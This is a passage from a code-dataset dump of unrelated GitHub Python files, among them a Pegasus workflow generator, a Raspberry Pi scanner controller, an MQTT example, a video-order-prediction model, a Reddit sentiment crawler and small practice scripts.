None\n wf_dir = None\n\n def __init__(self, dagfile=\"workflow.yml\"):\n self.dagfile = dagfile\n self.wf_name = \"coconet_workflow\"\n self.wf_dir = Path(__file__).parent.resolve()\n return\n\n\n def write(self):\n self.sc.write()\n self.props.write()\n self.rc.write()\n self.tc.write()\n self.wf.write()\n return\n\n\n def create_pegasus_properties(self):\n self.props = Properties()\n return\n\n\n def create_sites_catalog(self, exec_site_name=\"condorpool\"):\n self.sc = SiteCatalog()\n\n shared_scratch_dir = os.path.join(self.wf_dir, \"scratch\")\n local_storage_dir = os.path.join(self.wf_dir, \"output\")\n\n local = Site(\"local\")\\\n .add_directories(\n Directory(Directory.SHARED_SCRATCH, shared_scratch_dir)\n .add_file_servers(FileServer(\"file://\" + shared_scratch_dir, Operation.ALL)),\n \n Directory(Directory.LOCAL_STORAGE, local_storage_dir)\n .add_file_servers(FileServer(\"file://\" + local_storage_dir, Operation.ALL))\n )\n\n exec_site = Site(exec_site_name)\\\n .add_pegasus_profile(style=\"condor\")\\\n .add_condor_profile(universe=\"vanilla\")\\\n .add_profiles(Namespace.PEGASUS, key=\"data.configuration\", value=\"condorio\")\n\n self.sc.add_sites(local, exec_site)\n return\n\n\n # --- Transformation Catalog (Executables and Containers) ----------------------\n def create_transformation_catalog(self, exec_site_name=\"condorpool\"):\n self.tc = TransformationCatalog()\n \n motion_container = Container(\"motion_container\", Container.DOCKER, image=os.path.join(self.wf_dir, \"containers/motion_container.tar\"), image_site=\"condorpool\")\n detection_container = Container(\"detection_container\", Container.DOCKER, image=os.path.join(self.wf_dir, \"containers/detection_container.tar\"), image_site=\"condorpool\")\n\n motion_module = Transformation(\"motion_module\", site=exec_site_name, pfn=os.path.join(self.wf_dir, \"bin/motion_module_wrapper.sh\"), is_stageable=True, container=motion_container)\\\n .add_condor_profile(request_gpus=\"1\")\n \n detection_module = Transformation(\"detection_module\", site=exec_site_name, pfn=os.path.join(self.wf_dir, \"bin/detection_module_wrapper.sh\"), is_stageable=True, container=detection_container)\n tracking_fusion_module = Transformation(\"tracking_fusion_module\", site=exec_site_name, pfn=os.path.join(self.wf_dir, \"bin/tracking_fusion_module_wrapper.sh\"), is_stageable=False)\n\n self.tc.add_containers(motion_container, detection_container)\n self.tc.add_transformations(motion_module, detection_module, 
tracking_fusion_module)\n return\n\n\n # --- Replica Catalog ----------------------------------------------------------\n def create_replica_catalog(self):\n self.rc = ReplicaCatalog()\\\n .add_replica(\"local\", \"dataset.tar.gz\", os.path.join(self.wf_dir, \"input/dataset.tar.gz\"))\\\n .add_replica(\"local\", \"yolov3.cfg\", os.path.join(self.wf_dir, \"input/yolov3.cfg\"))\\\n .add_replica(\"local\", \"yolov3.weights\", os.path.join(self.wf_dir, \"input/yolov3.weights\"))\n return\n\n\n # --- Submit Workflow ----------------------------------------------------------\n def submit_workflow(self):\n return\n\n \n # --- Create Workflow ----------------------------------------------------------\n def create_workflow(self):\n self.wf = Workflow(self.wf_name, infer_dependencies=True)\n \n dataset = File(\"dataset.tar.gz\")\n motion_output = File(\"motion_output.tar.gz\")\n motion_module_job = Job(\"motion_module\")\\\n .add_inputs(dataset)\\\n .add_outputs(motion_output, stage_out=True, register_replica=False)\n\n yolov3_cfg = File(\"yolov3.cfg\")\n yolov3_weights = File(\"yolov3.weights\")\n detection_output = File(\"detection_output.tar.gz\")\n detection_module_job = Job(\"detection_module\")\\\n .add_inputs(dataset, yolov3_cfg, yolov3_weights)\\\n .add_outputs(detection_output, stage_out=True, register_replica=False)\n\n self.wf.add_jobs(motion_module_job, detection_module_job)\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(description=\"Pegasus Coconet Workflow\")\n\n parser.add_argument(\"-o\", \"--output\", metavar=\"STR\", type=str, default=\"workflow.yml\", help=\"Output file (default: workflow.yml)\")\n\n args = parser.parse_args()\n\n workflow = CoconetWorkflow(args.output)\n \n print(\"Creating execution sites...\")\n workflow.create_sites_catalog()\n\n print(\"Creating workflow properties...\")\n workflow.create_pegasus_properties()\n \n print(\"Creating transformation catalog...\")\n workflow.create_transformation_catalog()\n\n print(\"Creating replica catalog...\")\n workflow.create_replica_catalog()\n\n print(\"Creating coconet workflow dag...\")\n workflow.create_workflow()\n\n workflow.write()\n","repo_name":"papajim/pegasus-coconet","sub_path":"workflow-generator.py","file_name":"workflow-generator.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"25179676970","text":"from Coordinates import Coordinates\r\nfrom PixelsToMm import PixelsToMm\r\nfrom Motor import Motor\r\nfrom Calculations import Calculations\r\nfrom SaveToSD import SaveToSD\r\nimport RPi.GPIO as GPIO\r\nimport cv2\r\nimport time\r\n\r\nbuttonPin = 10\r\n\r\npinRood = 40\r\npinBlauw = 36\r\npinGroen = 38\r\n\r\n\r\ndef changeColor(color):\r\n if color == 'blue':\r\n roodwaarde = (0 * 100) / 255\r\n groenwaarde = (0 * 100) / 255\r\n blauwwaarde = (255 * 100) / 255\r\n\r\n ROOD.ChangeDutyCycle(roodwaarde)\r\n GROEN.ChangeDutyCycle(groenwaarde)\r\n BLAUW.ChangeDutyCycle(blauwwaarde)\r\n\r\n elif color == 'green':\r\n roodwaarde = (0 * 100) / 255\r\n groenwaarde = (255 * 100) / 255\r\n blauwwaarde = (0 * 100) / 255\r\n\r\n ROOD.ChangeDutyCycle(roodwaarde)\r\n GROEN.ChangeDutyCycle(groenwaarde)\r\n BLAUW.ChangeDutyCycle(blauwwaarde)\r\n\r\n elif color == 'red':\r\n roodwaarde = (255 * 100) / 255\r\n groenwaarde = (0 * 100) / 255\r\n blauwwaarde = (0 * 100) / 255\r\n\r\n ROOD.ChangeDutyCycle(roodwaarde)\r\n GROEN.ChangeDutyCycle(groenwaarde)\r\n BLAUW.ChangeDutyCycle(blauwwaarde)\r\n\r\n\r\ndef 
waitForInput():\r\n changeColor('green')\r\n\r\n #print(\"Waiting on initial input...\")\r\n while True:\r\n if GPIO.input(buttonPin) == GPIO.LOW:\r\n #print(\"Knop is ingedrukt!\")\r\n changeColor('blue')\r\n break # Knop is ingedrukt\r\n\r\n\r\ndef main():\r\n MotorObject = Motor()\r\n CoordinatesObject = Coordinates()\r\n CalculationsObject = Calculations()\r\n SaveToSD_Object = SaveToSD()\r\n forceStopped = False\r\n\r\n waitForInput()\r\n time.sleep(2)\r\n\r\n for i in range(73): # alleen voor debugging\r\n\r\n if GPIO.input(buttonPin) == GPIO.LOW: # Force stop\r\n print(\"Force stopping!\")\r\n forceStopped = True\r\n changeColor('red')\r\n break\r\n\r\n MotorObject.turnMotor(i)\r\n CoordinatesObject.calculate_coordinates(i)\r\n\r\n if not forceStopped:\r\n CalculationsObject.run()\r\n SaveToSD_Object.save()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n GPIO.setwarnings(False)\r\n GPIO.setmode(GPIO.BOARD)\r\n GPIO.setup(buttonPin, GPIO.IN, pull_up_down=GPIO.PUD_UP)\r\n\r\n GPIO.setup(pinBlauw, GPIO.OUT)\r\n GPIO.setup(pinGroen, GPIO.OUT)\r\n GPIO.setup(pinRood, GPIO.OUT)\r\n\r\n BLAUW = GPIO.PWM(pinBlauw, 1000)\r\n GROEN = GPIO.PWM(pinGroen, 1000)\r\n ROOD = GPIO.PWM(pinRood, 1000)\r\n ROOD.start(0)\r\n GROEN.start(0)\r\n BLAUW.start(0)\r\n\r\n main()\r\n","repo_name":"mattie078/3d-scanner","sub_path":"src/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2514,"program_lang":"python","lang":"nl","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15622392201","text":"import os\nimport board\nimport busio\nfrom digitalio import DigitalInOut\nfrom adafruit_esp32spi import adafruit_esp32spi\nimport adafruit_esp32spi.adafruit_esp32spi_socket as socket\nimport adafruit_minimqtt.adafruit_minimqtt as MQTT\n\n# Add settings.toml to your filesystem CIRCUITPY_WIFI_SSID and CIRCUITPY_WIFI_PASSWORD keys\n# with your WiFi credentials. 
Add your Adafruit IO username and key as well.\n# DO NOT share that file or commit it into Git or other source control.\n\naio_username = os.getenv(\"aio_username\")\naio_key = os.getenv(\"aio_key\")\n\n# If you are using a board with pre-defined ESP32 Pins:\nesp32_cs = DigitalInOut(board.ESP_CS)\nesp32_ready = DigitalInOut(board.ESP_BUSY)\nesp32_reset = DigitalInOut(board.ESP_RESET)\n\n# If you have an externally connected ESP32:\n# esp32_cs = DigitalInOut(board.D9)\n# esp32_ready = DigitalInOut(board.D10)\n# esp32_reset = DigitalInOut(board.D5)\n\nspi = busio.SPI(board.SCK, board.MOSI, board.MISO)\nesp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)\n\nprint(\"Connecting to AP...\")\nwhile not esp.is_connected:\n try:\n esp.connect_AP(\n os.getenv(\"CIRCUITPY_WIFI_SSID\"), os.getenv(\"CIRCUITPY_WIFI_PASSWORD\")\n )\n except RuntimeError as e:\n print(\"could not connect to AP, retrying: \", e)\n continue\nprint(\"Connected to\", str(esp.ssid, \"utf-8\"), \"\\tRSSI:\", esp.rssi)\n\n### Topic Setup ###\n\n# MQTT Topic\n# Use this topic if you'd like to connect to a standard MQTT broker\n# mqtt_topic = \"test/topic\"\n\n# Adafruit IO-style Topic\n# Use this topic if you'd like to connect to io.adafruit.com\nmqtt_topic = aio_username + \"/feeds/temperature\"\n\n\n### Code ###\n\n\n# Define callback methods which are called when events occur\n# pylint: disable=unused-argument, redefined-outer-name\ndef connect(mqtt_client, userdata, flags, rc):\n # This function will be called when the mqtt_client is connected\n # successfully to the broker.\n print(\"Connected to MQTT Broker!\")\n print(\"Flags: {0}\\n RC: {1}\".format(flags, rc))\n\n\ndef disconnect(mqtt_client, userdata, rc):\n # This method is called when the mqtt_client disconnects\n # from the broker.\n print(\"Disconnected from MQTT Broker!\")\n\n\ndef subscribe(mqtt_client, userdata, topic, granted_qos):\n # This method is called when the mqtt_client subscribes to a new feed.\n print(\"Subscribed to {0} with QOS level {1}\".format(topic, granted_qos))\n\n\ndef unsubscribe(mqtt_client, userdata, topic, pid):\n # This method is called when the mqtt_client unsubscribes from a feed.\n print(\"Unsubscribed from {0} with PID {1}\".format(topic, pid))\n\n\ndef publish(mqtt_client, userdata, topic, pid):\n # This method is called when the mqtt_client publishes data to a feed.\n print(\"Published to {0} with PID {1}\".format(topic, pid))\n\n\ndef message(client, topic, message):\n print(\"New message on topic {0}: {1}\".format(topic, message))\n\n\nsocket.set_interface(esp)\nMQTT.set_socket(socket, esp)\n\n# Set up a MiniMQTT Client\nmqtt_client = MQTT.MQTT(\n broker=\"io.adafruit.com\",\n username=aio_username,\n password=aio_key,\n)\n\n# Connect callback handlers to mqtt_client\nmqtt_client.on_connect = connect\nmqtt_client.on_disconnect = disconnect\nmqtt_client.on_subscribe = subscribe\nmqtt_client.on_unsubscribe = unsubscribe\nmqtt_client.on_publish = publish\nmqtt_client.on_message = message\n\nprint(\"Attempting to connect to %s\" % mqtt_client.broker)\nmqtt_client.connect()\n\nprint(\"Subscribing to %s\" % mqtt_topic)\nmqtt_client.subscribe(mqtt_topic)\n\nprint(\"Publishing to %s\" % mqtt_topic)\nmqtt_client.publish(mqtt_topic, \"Hello Broker!\")\n\nprint(\"Unsubscribing from %s\" % mqtt_topic)\nmqtt_client.unsubscribe(mqtt_topic)\n\nprint(\"Disconnecting from %s\" % 
mqtt_client.broker)\nmqtt_client.disconnect()\n","repo_name":"adafruit/Adafruit_CircuitPython_MiniMQTT","sub_path":"examples/minimqtt_simpletest.py","file_name":"minimqtt_simpletest.py","file_ext":"py","file_size_in_byte":3745,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"72"} +{"seq_id":"25243932904","text":"n, k = map(int, input().split())\ncoin = []\nfor i in range(n):\n money = int(input())\n coin.append(money)\ncoin.sort(reverse=True)\n\nresult = 0\nfor a in coin:\n if k//a == 0:\n continue\n else:\n result += k//a\n k = k%a\nprint(result)\n","repo_name":"hahyeyoung/python","sub_path":"Baekjoon/그리디/11047 동전0.py","file_name":"11047 동전0.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11439460847","text":"import torch\nfrom torch import nn\nfrom mmcv.cnn import kaiming_init, normal_init\nimport math\nimport numpy as np\nimport torch.nn.functional as F\n\nfrom ...train_step_mixin import TrainStepMixin\nfrom ....builder import MODELS, build_backbone\n\n\n@MODELS.register_module()\nclass VCOP(nn.Module, TrainStepMixin):\n \"\"\" pretext task: video clip order predction [1].\n\n Official github: https://github.com/xudejing/video-clip-order-prediction\n\n [1] Self-supervised Spatiotemporal Learning via Video Clip Order\n Prediction, CVPR'19\n\n \"\"\"\n def __init__(self,\n backbone,\n vcop_head):\n super(VCOP, self).__init__()\n self.backbone = build_backbone(backbone)\n self.vcop_head = VCOPHead(**vcop_head)\n self.init_weights()\n\n def init_weights(self):\n self.backbone.init_weights()\n self.vcop_head.init_weights()\n\n def forward(self,\n imgs: torch.Tensor,\n gt_labels: torch.Tensor):\n # imgs in shape of [B, N-seg, 3, T, H, W]\n batch_size, tuple_len, channels, clip_len, h, w = imgs.size()\n imgs = imgs.view(-1, channels, clip_len, h, w)\n feats = self.backbone(imgs)\n order_preds = self.vcop_head(feats)\n losses = self.vcop_head.loss(order_preds, gt_labels)\n return losses\n\n\nclass VCOPHead(nn.Module):\n\n def __init__(self,\n in_channels: int,\n tuple_len: int,\n hidden_channels: int = 512,\n dropout_ratio: float = 0.25):\n super(VCOPHead, self).__init__()\n self.tuple_len = tuple_len\n self.in_channels = in_channels\n self.hidden_channels = hidden_channels\n self.class_num = int(math.factorial(tuple_len))\n self.fc1 = nn.Linear(in_channels * 2, hidden_channels)\n self.num_pairs = (tuple_len - 1) * tuple_len // 2\n pair_inds = [(i, j)\n for i in range(tuple_len)\n for j in range(i+1, tuple_len)]\n self.pair_inds = torch.LongTensor(np.array(pair_inds).reshape(-1))\n assert self.pair_inds.size(0) == self.num_pairs * 2\n self.fc2 = nn.Linear(hidden_channels * self.num_pairs, self.class_num)\n self.dropout = nn.Dropout(dropout_ratio)\n self.relu = nn.ReLU(inplace=True)\n\n def init_weights(self):\n kaiming_init(self.fc1)\n normal_init(self.fc2, std=0.001)\n\n def forward(self, feats: torch.Tensor):\n batch_size = feats.size(0) // self.tuple_len\n assert feats.size(1) == self.in_channels\n feats = feats.view((batch_size, self.tuple_len, self.in_channels, -1))\n # apply average pooling\n # [batch_size, tuple_len, channels]\n feats = torch.mean(feats, dim=3, keepdim=False)\n pair_inds = self.pair_inds.to(feats.device)\n feats = torch.index_select(feats, dim=1, index=pair_inds).contiguous()\n feats = feats.view(batch_size * self.num_pairs, self.in_channels * 2)\n feats = self.relu(self.fc1(feats))\n feats = feats.view(batch_size, 
self.num_pairs * self.hidden_channels)\n feats = self.dropout(feats)\n cls_logits = self.fc2(feats)\n return cls_logits\n\n def loss(self, cls_logits: torch.Tensor, gt_labels: torch.Tensor):\n losses = dict()\n cls_logits = cls_logits.view(-1, self.class_num)\n batch_size = cls_logits.size(0)\n cls_preds = cls_logits.argmax(dim=1)\n losses['loss_cls'] = F.cross_entropy(cls_logits, gt_labels.view(-1))\n losses['accuracy'] = (cls_preds.eq(gt_labels.view(-1))).float().sum()\n losses['accuracy'] = losses['accuracy'] / batch_size\n return losses\n","repo_name":"microsoft/CtP","sub_path":"pyvrl/models/pretraining/vcop/vcop_model.py","file_name":"vcop_model.py","file_ext":"py","file_size_in_byte":3677,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"72"} +{"seq_id":"9470429449","text":"import json\r\nimport requests\r\nimport boto3\r\nfrom boto3.dynamodb.conditions import Key, Attr\r\nfrom decimal import Decimal\r\nimport random\r\nimport time\r\n\r\nrequests.adapters.DEFAULT_RETRIES = 5\r\n\r\ndef get_pushshift_comment(data_type, **kwargs):\r\n base_url = f\"https://api.pushshift.io/reddit/search/comment/\"\r\n payload = kwargs\r\n request = requests.get(base_url, params=payload)\r\n return request.json()\r\n\r\ndef get_pushshift_post(data_type, **kwargs):\r\n base_url = f\"https://api.pushshift.io/reddit/search/submission/\"\r\n payload = kwargs\r\n request = requests.get(base_url, params=payload)\r\n return request.json()\r\n \r\nfrom datetime import datetime\r\ndef convert_time(ts):\r\n dt = datetime.fromtimestamp(ts)\r\n return f\"{dt.year}-{dt.month}-{dt.day}\"\r\n \r\ndef get_stats(arr):\r\n arr.sort()\r\n if not arr:\r\n return []\r\n ret = [arr[0], arr[len(arr)//4], arr[len(arr)//2], arr[len(arr)*3//4], arr[-1]]\r\n for i in range(len(ret)):\r\n ret[i] = round(ret[i],2)\r\n return ret\r\n\r\ndef get_senti_score(text):\r\n base_url = f\"http://52.206.155.70:8080/sentiscore\"\r\n payload = {'text': text}\r\n request = requests.get(base_url, json=payload)\r\n # print(text)\r\n # print(request)\r\n return request.json()\r\n\r\ndef crawler(stock):\r\n data_type=\"comment\" # give me comments, use \"submission\" to publish something\r\n query= stock #\"tsla\" # Add your query\r\n duration=\"24h\" # Select the timeframe. Epoch value or Integer + \"s,m,h,d\" (i.e. \"second\", \"minute\", \"hour\", \"day\")\r\n size=10000 # maximum 1000 comments\r\n sort_type=\"score\" # Sort by score (Accepted: \"score\", \"num_comments\", \"created_utc\")\r\n sort=\"desc\" # sort descending\r\n aggs=\"subreddit\" #\"author\", \"link_id\", \"created_utc\", \"subreddit\"\r\n try:\r\n comment = get_pushshift_comment(data_type=data_type, \r\n q=query, \r\n after=duration, \r\n size=size, \r\n sort_type=sort_type,\r\n sort=sort)\r\n except:\r\n comment = {'data':[]}\r\n try:\r\n \r\n post = get_pushshift_post(data_type=data_type, \r\n q=query, \r\n after=duration, \r\n size=size, \r\n sort_type=sort_type,\r\n sort=sort)\r\n except:\r\n post = {'data':[]}\r\n \r\n # print(comment)\r\n c = []\r\n for each in post['data']:\r\n c.append({\r\n 'text': (each['title'] +\" . 
\"+each['selftext'])[:100],\r\n 'date': convert_time(each['created_utc']) ,\r\n 'id': each['id']\r\n })\r\n # print(post)\r\n p = []\r\n for each in comment['data']:\r\n p.append({\r\n 'text': each['body'][:100],\r\n 'date': convert_time(each['created_utc']),\r\n 'id': each['id']\r\n })\r\n \r\n text = p + c\r\n scores = []\r\n \r\n \r\n for i, each in enumerate(text):\r\n score = get_senti_score(each['text'])# random.randrange(-100,100)*0.01\r\n s = score['body']['scores']\r\n scores.append(s)\r\n text[i]['score'] = s\r\n \r\n from datetime import date\r\n import datetime\r\n today = date.today()\r\n # est = datetime.timedelta(hours=-5)\r\n # today += est\r\n date = str(today)\r\n \r\n print(date)\r\n stock = query\r\n \r\n dynamodb = boto3.resource('dynamodb')\r\n table = dynamodb.Table('meme_stock_history')\r\n response = table.get_item(\r\n Key={\r\n 'rid': f'{stock}_{date}'\r\n }\r\n )\r\n # print(response)\r\n src = 'Reddit'\r\n \r\n \r\n if 'Item' not in response:\r\n \r\n \r\n data = {\r\n 'rid': f\"{stock}_{date}\".lower(),\r\n 'stock': stock,\r\n 'date': date,\r\n 'records': {\r\n 'comment': text\r\n },\r\n 'sentiments': [\r\n {\r\n 'source': src,\r\n 'scores': get_stats(scores)\r\n }\r\n ],\r\n 'v': 0\r\n \r\n }\r\n response = table.put_item (\r\n Item = json.loads(json.dumps(data), parse_float=Decimal)\r\n )\r\n # print (response)\r\n \r\n \r\n else:\r\n \r\n data = response['Item']\r\n data['records']['comment'] += text\r\n added = False\r\n for i, each in enumerate(data['sentiments']):\r\n if each['source'] == src:\r\n added = True\r\n data['sentiments'][i] = {\r\n 'source': src,\r\n 'scores': get_stats(scores)\r\n }\r\n break\r\n if not added:\r\n data['sentiments'].append( {\r\n 'source': src,\r\n 'scores': get_stats(scores)\r\n })\r\n for i in range(len(data['sentiments'])):\r\n for j in range(len(data['sentiments'][i]['scores'])):\r\n data['sentiments'][i]['scores'][j] = float(data['sentiments'][i]['scores'][j])\r\n\r\n for i in range(len(data['records']['comment'])):\r\n data['records']['comment'][i]['score'] = float( data['records']['comment'][i]['score'] )\r\n \r\n if 'price' in data and 'close' in data['price']:\r\n data['price']['close'] = float(data['price']['close'])\r\n \r\n data['v'] += 1\r\n data['v'] = float(data['v'])\r\n \r\n added = set()\r\n comments = []\r\n for comment in data['records']['comment']:\r\n if comment['id'] not in added:\r\n added.add(comment['id'])\r\n comments.append(comment)\r\n data['records']['comment'] = comments\r\n \r\n \r\n response = table.put_item(\r\n Item = json.loads(json.dumps(data), parse_float=Decimal)\r\n )\r\n # print (response)\r\n print(data)\r\n \r\n \r\n\r\ndef lambda_handler(event, context):\r\n dynamodb = boto3.resource('dynamodb')\r\n table = dynamodb.Table('meme_stock_history')\r\n response = table.get_item(\r\n Key={\r\n 'rid': 'stock_tickers'\r\n }\r\n )\r\n print(response)\r\n stocks = []\r\n for each in response['Item']['tickers']:\r\n stocks.append(each)\r\n print(stocks)\r\n \r\n \r\n \r\n res = []\r\n for stock in stocks:\r\n print(\"crawling: \"+stock)\r\n # print( type(stock) )\r\n crawler(str(stock))\r\n time.sleep(2)\r\n # res.append(response)\r\n \r\n \r\n\r\n \r\n \r\n return {\r\n 'statusCode': 200,\r\n 'body': {\r\n 'responses': ''\r\n }\r\n }\r\n","repo_name":"MemestockSentiTracker/memestocks_backend","sub_path":"lf_reddit.py","file_name":"lf_reddit.py","file_ext":"py","file_size_in_byte":6843,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} 
+{"seq_id":"23670877400","text":"# Division,Line,Station Name,Station Latitude,Station Longitude,Route1,Route2,Route3,Route4,Route5,Route6,Route7,Route8,Route9,Route10,Route11,Entrance Type,Entry,Exit Only,Vending,Staffing,Staff Hours,ADA,ADA Notes,Free Crossover,North South Street,East West Street,Corner,Entrance Latitude,Entrance Longitude,Station Location,Entrance Location\nimport json\n\n\nimport requests\n\nfrom config import *\n\n\n# Store all the stations into list\ndef openStation(filename='data/subway.csv'):\n file = open(filename)\n file.next()\n stations = [] # Lat, Lng\n for line in file:\n temp = line.split(',')\n stations.append([float(temp[28]), float(temp[29]),temp[2]])\n return stations\n\n\ndef isNearby(Lat, Lng, stations, radius=0.005):\n LatRange = (Lat - radius, Lat + radius)\n LngRange = (Lng - radius, Lng + radius)\n for station in stations:\n if station[0] >= LatRange[0] and station[0] <= LatRange[1] and station[1] >= LngRange[0] and station[1] <= \\\n LngRange[1]:\n return True\n return False\n\n\ndef calDirection(fromLoc, toLoc, mode='walking', units='metric'):\n URL = 'https://maps.googleapis.com/maps/api/directions/json?units=' + units + '&mode=' + mode + '&origin=' + str(\n fromLoc[0]) + ',' + str(fromLoc[1]) + '&destination=' + str(toLoc[0]) + ',' + str(\n toLoc[1]) + '&key=' + API_Direction\n response = requests.get(URL)\n if response.status_code == 200:\n jsonfile = json.loads(response.content)\n if jsonfile['rows'][0]['elements'][0]['status'] == 'OK':\n estDis = jsonfile['rows'][0]['elements'][0]['distance']['value'] # in meter\n # estTime = jsonfile['rows'][0]['elements'][0]['duration']['value'] # in seconds\n return estDis\n\n\ndef calDis(fromLoc, toLoc, mode='walking', units='metric'):\n URL = 'https://maps.googleapis.com/maps/api/distancematrix/json?units=' + units + '&mode=' + mode + '&origins=' + str(\n fromLoc[0]) + ',' + str(fromLoc[1]) + '&destinations=' + str(toLoc[0]) + ',' + str(\n toLoc[1]) + '&key=' + API_Distance\n response = requests.get(URL)\n if response.status_code == 200:\n jsonfile = json.loads(response.content)\n if jsonfile['rows'][0]['elements'][0]['status'] == 'OK':\n estDis = jsonfile['rows'][0]['elements'][0]['distance']['value'] # in meter\n # estTime = jsonfile['rows'][0]['elements'][0]['duration']['value'] # in seconds\n return estDis\n\n\ndef stationFrequency(distanceData, radius = 0.005):\n from collections import Counter\n valid = []\n for trip in distanceData:\n if trip[7] <= radius and trip[8] <= radius:\n valid.append(trip[12] + ' to ' + trip[13])\n return Counter(valid).most_common(10)\n\ndef laziness(distanceData):\n import numpy as np\n import matplotlib.pyplot as plt\n hours = []\n for i in range(24):\n time = str(i).zfill(2) + ':00 - ' + str(i + 1).zfill(2) + ':00'\n hours.append(time)\n totalPUDistance = [0. 
for i in range(24)]\n countPUDistance = [0 for i in range(24)]\n for trip in distanceData:\n PUHour = trip[0].hour\n # DOHour = trip[1].hour\n if trip[7] < 0.1 and trip[8] < 0.1:\n totalPUDistance[PUHour] = totalPUDistance[PUHour] + trip[7] + trip[8]\n countPUDistance[PUHour] += 1\n res = []\n for i in range(24):\n res.append(totalPUDistance[i]/float(countPUDistance[i]))\n objects = tuple(hours) # x axis value\n y_pos = np.arange(len(objects)) # x axis names\n plt.bar(y_pos, res, align='center', alpha=0.5)\n plt.xticks(y_pos, objects, rotation=90)\n plt.ylabel('Avg Distance to Station')\n plt.title('Distance to Stations of all Taxi Trips')\n plt.show()","repo_name":"LamsokLee/UberAnalysis","sub_path":"subway.py","file_name":"subway.py","file_ext":"py","file_size_in_byte":3716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71892994152","text":"from django.http import JsonResponse\n\n\nclass ResultMaker:\n\n @staticmethod\n def success(data):\n # if isinstance(data, object):\n # data = JsonUtil.object_to_dict(data)\n\n result = {\n \"code\": 0,\n \"data\": data\n }\n return JsonResponse(result, json_dumps_params={'ensure_ascii': False})\n\n @staticmethod\n def fail(code=1, msg=None, data=None):\n result = {\n \"code\": code,\n \"data\": {\n \"message\": msg,\n \"data\": data\n }\n }\n return JsonResponse(result, json_dumps_params={'ensure_ascii': False})\n","repo_name":"DataCanvasIO/LMPM","sub_path":"backend/promptmanager/app_common/result_maker.py","file_name":"result_maker.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"72"} +{"seq_id":"32804586784","text":"import logging\nfrom summary.summaryitem import SummaryItem\nfrom database.database import Database as Db\nfrom database.tables.tsentry import TsEntryTable\nfrom summary.matrix.matrixdata import MatrixData\n\n#----------------------------------------------------------------------\nclass AmRkaData(MatrixData):\n#----------------------------------------------------------------------\n def __init__(self,item):\n\n super().__init__(item)\n\n raise\n\n codes = ['ERC','NOK','ALU','SPR','ATT','TMO','QUA','INT','QOR','TER','SKY','OTHERS','COB','TTT','OTH']\n\n weekList = Db.WeeksTbl.GetWeeks(Db.db,period)\n data = Db.TsEntryTbl.GetAmRkaSum(Db.db,region,codes,weekList)\n\n colSumList = super().calcColSum(data)\n rowSumList = super().calcRowSum(data)\n weeks = super().calcCols(colSumList)\n if (weeks != len(weekList)):\n weeks = len(weekList)\n rowAvgList = super().calcRowAvg(rowSumList,weeks)\n\n self.compData = [rowAvgList]\n self.data = super().calcData(data,len(codes),weeks)\n\n self.dataCols = len(self.data)\n self.dataRows = len(self.data[0])\n\n\n self.title = 'AM Regional Key Customers'\n self.colDesc = []\n for i in range(self.dataCols):\n self.colDesc.append('Week ' + str(i+1))\n\n self.colCompDesc = ['Avg']\n\n self.rowDesc = ['Ericsson','Nokia','Alcatel-Lucent','Sprint','AT&T','T-Mobile',\n 'Qualcomm','Intel','Qorvo','Teradyne','Skyworks',\n 'Sum of all other customers', \\\n 'Cobham', 'Technical Training - All Types','Customer \\'Other\\'']\n\n self.rowCompDesc = []\n\n super().calcSize()\n\n self.rangeList = []\n\n","repo_name":"lhoag64/Queries","sub_path":"Queries/Queries/summary/matrix/Archive/amrkadata.py","file_name":"amrkadata.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} 
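# ---------------------------------------------------------------------------
# Editorial sketch (not one of the dataset records above or below): the
# axis-aligned bounding-box test from isNearby() in the subway.py record
# above, restated and exercised. The station coordinates here are
# illustrative values, and 0.005 degrees of latitude is roughly 550 m, so
# this is a cheap square filter rather than a true radius check.
def is_nearby(lat, lng, stations, radius=0.005):
    # A station matches when it falls inside the square
    # [lat-radius, lat+radius] x [lng-radius, lng+radius].
    return any(
        abs(s_lat - lat) <= radius and abs(s_lng - lng) <= radius
        for s_lat, s_lng, _name in stations
    )

stations = [(40.7527, -73.9772, "Grand Central-42 St")]  # hypothetical row
assert is_nearby(40.7531, -73.9780, stations)      # ~50 m away: inside the box
assert not is_nearby(40.7000, -73.9780, stations)  # far to the south: outside
# ---------------------------------------------------------------------------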
+{"seq_id":"2279809188","text":"# input = ABACADABRAC pattern = ABRA\n# output= Substring is present \n\n\ndef substring(givenstring , pattern):\n length1 = len(givenstring)\n length2 = len(pattern)\n\n for index in range(0,length1-length2):\n for i in range(0,length2):\n if pattern[i] != givenstring[index + i]:\n break\n \n if length2-1 == i:\n return \"Bro substring is present\"\n\n return \"Substring not present\"\n\nresult = substring(\"ABACADABRAC\", \"ABRAa\")\nprint(result)","repo_name":"karthiikselvam/payirchi","sub_path":"Strings/substringsearch.py","file_name":"substringsearch.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31820329237","text":"\"\"\"\r\nFiverr Project for ryancox642\r\nRaffle Game\r\n\"\"\"\r\n\r\nimport pygame, sys, random\r\nfrom tkinter import messagebox, Tk\r\nimport tkinter as tk \r\nfrom PIL import ImageTk, Image\r\nfrom copy import deepcopy\r\n\r\ndef show_text(Text,X,Y,Spacing,WidthLimit,Font,surface,double=1,overflow='normal'):\r\n Text += ' '\r\n if double == 2:\r\n X = int(X/2)\r\n Y = int(Y/2)\r\n OriginalX = X\r\n OriginalY = Y\r\n 